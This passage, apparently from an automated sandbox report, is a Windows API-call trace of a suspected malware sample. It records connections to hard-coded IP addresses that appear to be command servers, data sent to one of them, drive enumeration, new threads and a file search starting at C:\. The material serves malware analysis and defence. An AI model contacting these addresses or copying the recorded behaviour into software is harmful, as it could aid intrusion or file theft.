returned 0x59b50 [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce70 | out: hHeap=0x20000) returned 1 [0058.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x316a0 | out: hHeap=0x20000) returned 1 [0058.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7ce70 [0058.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cce0 [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.195] GetLastError () returned 0x0 [0058.195] SetLastError (dwErrCode=0x0) [0058.196] GetLastError () returned 0x0 [0058.196] SetLastError (dwErrCode=0x0) [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x1) returned 0x7ccf0 [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x6) returned 0x7d060 [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x5) returned 0x7d020 [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7cf50 [0058.196] GetLastError () returned 0x0 [0058.196] SetLastError (dwErrCode=0x0) [0058.196] GetLastError () returned 0x0 [0058.196] SetLastError (dwErrCode=0x0) [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0058.196] GetLastError () returned 0x0 [0058.196] SetLastError (dwErrCode=0x0) [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce70 | out: hHeap=0x20000) returned 1 [0058.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x59b50 | out: hHeap=0x20000) returned 1 [0058.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf50 | out: hHeap=0x20000) returned 1 [0058.196] GetLastError () returned 0x0 [0058.196] SetLastError (dwErrCode=0x0) [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cee0 [0058.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0058.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ced0 | out: hHeap=0x20000) returned 1 [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7ced0 [0058.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88838 [0058.196] GetLastError () returned 0x0 [0058.197] GetProcAddress (hModule=0x747b0000, lpProcName="FlsGetValue") returned 0x748970c0 [0058.197] SetLastError (dwErrCode=0x0) [0058.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0058.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88838 | out: hHeap=0x20000) returned 1 [0058.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce60 | out: hHeap=0x20000) returned 1 [0058.197] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce80 | out: hHeap=0x20000) returned 1 [0058.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0058.197] socket (af=2, type=1, protocol=0) returned 0x3fc [0058.200] ioctlsocket (in: s=0x3fc, cmd=-2147195266, argp=0x118d98c | out: argp=0x118d98c) returned 0 [0058.200] setsockopt (s=0x3fc, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0058.201] htonl (hostlong=0xaef7fb94) returned 0x94fbf7ae [0058.201] htonl (hostlong=0x94fbf7ae) returned 0xaef7fb94 [0058.201] htons (hostshort=0x50) returned 0x5000 [0058.201] connect (s=0x3fc, name=0x118dacc*(sa_family=2, sin_port=0x50, sin_addr="148.251.247.174"), namelen=16) returned 0 [0058.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7ce60 [0058.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7ce70 [0058.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.226] SetLastError (dwErrCode=0x0) [0058.226] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0058.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0058.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] GetLastError () returned 0x0 [0058.227] SetLastError (dwErrCode=0x0) [0058.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x100) returned 0x30fc0 [0058.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0058.228] GetLastError () returned 0x0 [0058.228] SetLastError (dwErrCode=0x0) [0058.228] GetLastError () returned 0x0 [0058.228] SetLastError (dwErrCode=0x0) [0058.228] GetLastError () returned 0x0 [0058.228] SetLastError (dwErrCode=0x0) [0058.228] GetLastError () returned 0x0 [0058.228] SetLastError (dwErrCode=0x0) [0058.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x5e570 [0058.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0058.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce70 | out: hHeap=0x20000) returned 1 [0058.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce60 | out: hHeap=0x20000) returned 1 [0058.228] send (s=0x3fc, buf=0x5e570*, len=134, flags=0) returned 134 [0058.232] recv (in: s=0x3fc, buf=0x118dbb0, len=1024, flags=0 | out: buf=0x118dbb0*) returned 217 [0058.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x5a6b8 [0058.258] recv (in: s=0x3fc, buf=0x118dbb0, len=1024, flags=0 | out: buf=0x118dbb0) returned 0 [0058.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7ce60 [0058.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0058.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd9) returned 0x51398 [0058.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7ce70 [0058.258] GetLastError () returned 0x0 [0058.258] SetLastError (dwErrCode=0x0) [0058.258] GetLastError () returned 0x0 [0058.258] SetLastError (dwErrCode=0x0) [0058.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x59b50 [0058.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0058.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x316a0 | out: hHeap=0x20000) returned 1 [0058.258] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf10 [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7d040 [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7cf90 [0058.259] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x316a0 [0058.259] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0058.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x59b50 | out: hHeap=0x20000) returned 1 [0058.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0058.259] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf50 [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cf30 [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x4) returned 0x7cff0 [0058.259] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0xb8) returned 0x59b50 [0058.259] GetLastError () returned 0x0 [0058.259] SetLastError (dwErrCode=0x0) [0058.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a6) returned 0x5d1f8 [0058.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5d1f8 | out: hHeap=0x20000) returned 1 [0058.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf50 | out: hHeap=0x20000) returned 1 [0058.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x316a0 | out: hHeap=0x20000) returned 1 [0058.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cff0 | out: hHeap=0x20000) returned 1 [0058.260] GetLastError () returned 0x0 [0058.260] SetLastError (dwErrCode=0x0) [0058.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cff0 [0058.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf30 | out: hHeap=0x20000) returned 1 [0058.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf50 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886d0 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e490 [0058.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886d0 | out: hHeap=0x20000) returned 1 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883d8 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0058.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883d8 | out: hHeap=0x20000) returned 1 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0058.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0058.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0058.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x32318 [0058.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0058.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x469a0 [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e490 | out: hHeap=0x20000) returned 1 [0058.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0058.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x884a0 [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x884a0 | out: hHeap=0x20000) returned 1 [0058.262] RtlWakeAllConditionVariable (in: ConditionVariable=0x108616c | out: ConditionVariable=0x108616c) [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ce60 | out: hHeap=0x20000) returned 1 [0058.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0058.262] closesocket (s=0x3fc) returned 0 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88590 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0058.263] inet_addr (cp="95.222.165.118") returned 0x76a5de5f [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x32318 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469a0 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0058.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886f8 | out: hHeap=0x20000) returned 1 [0058.263] inet_addr (cp="176.31.68.30") returned 0x1e441fb0 [0058.263] inet_ntoa (in=0x76a5de5f) returned="95.222.165.118" [0058.263] socket (af=2, type=1, protocol=0) returned 0x3fc [0058.264] ioctlsocket (in: s=0x3fc, cmd=-2147195266, argp=0x118df84 | out: argp=0x118df84) returned 0 [0058.264] setsockopt (s=0x3fc, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0058.264] htonl (hostlong=0x1e441fb0) returned 0xb01f441e [0058.264] htonl (hostlong=0xb01f441e) returned 0x1e441fb0 [0058.264] htons (hostshort=0x1f90) returned 0x901f [0058.264] connect (s=0x3fc, name=0x118e0c4*(sa_family=2, sin_port=0x1f90, sin_addr="176.31.68.30"), namelen=16) returned -1 [0059.496] WSAGetLastError () returned 10061 [0059.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68f40 [0059.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0059.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0059.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0059.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0059.496] send (s=0x3fc, buf=0x2e430*, len=120, flags=0) returned -1 [0059.496] WSAGetLastError () returned 10057 [0059.496] recv (in: s=0x3fc, buf=0x118e294, len=7, flags=0 | out: buf=0x118e294) returned -1 [0059.496] WSAGetLastError () returned 10057 [0059.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0059.496] closesocket (s=0x3fc) returned 0 [0059.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x87e48 | out: hHeap=0x20000) returned 1 [0059.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x72188 | out: hHeap=0x20000) returned 1 [0059.497] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.497] GetLogicalDrives () returned 0x4 [0059.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1e0) returned 0x5e688 [0059.497] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.497] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.498] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.498] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0059.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x76d20 [0059.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88360 [0059.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883d8 [0059.498] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x14) returned 0x6f5a8 [0059.498] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1013ed0, phModule=0x6f5b4 | out: phModule=0x6f5b4*=0x1000000) returned 1 [0059.498] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1046500, lpParameter=0x6f5a8, dwCreationFlags=0x0, lpThreadId=0x118e294 | out: lpThreadId=0x118e294*=0xc10) returned 0x3fc [0059.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x76a80 [0059.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88590 [0059.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88838 [0059.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x14) returned 0x6f388 [0059.499] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x1013ed0, phModule=0x6f394 | out: phModule=0x6f394*=0x1000000) returned 1 [0059.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1046500, lpParameter=0x6f388, dwCreationFlags=0x0, lpThreadId=0x118e294 | out: lpThreadId=0x118e294*=0x8d0) returned 0x404 [0059.499] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.499] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetDriveTypeA (lpRootPathName="") returned 0x1 [0059.500] GetCurrentThreadId () returned 0x13c8 [0059.500] WaitForSingleObjectEx (hHandle=0x3fc, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 7 os_tid = 0x10fc Thread: id = 8 os_tid = 0x118c Thread: id = 9 os_tid = 0xf90 Thread: id = 10 os_tid = 0xf54 Thread: id = 11 os_tid = 0x11e4 Thread: id = 12 os_tid = 0xf38 Thread: id = 13 os_tid = 0x11cc Thread: id = 34 os_tid = 0xc10 [0059.535] GetLastError () returned 0x57 [0059.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x8, Size=0x364) returned 0x87e48 [0059.535] SetLastError (dwErrCode=0x57) [0059.535] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x77840000 [0059.535] GetProcAddress (hModule=0x77840000, lpProcName="AppPolicyGetThreadInitializationType") returned 0x77843210 [0059.535] AppPolicyGetThreadInitializationType () returned 0x0 [0059.536] GetLastError () returned 0x57 [0059.536] SetLastError (dwErrCode=0x57) [0059.536] AreFileApisANSI () returned 1 [0059.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f934, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr="C:\\") returned 4 [0059.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7ce60 [0059.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5e8 [0059.536] FindFirstFileExW (in: lpFileName="C:\\\\*", fInfoLevelId=0x0, lpFindFileData=0x313f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313f184) returned 0x78dd0 [0059.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x884a0 [0059.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x884a0 | out: hHeap=0x20000) returned 1 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76620 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886d0 [0059.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x76af0 [0059.537] HeapFree (in: 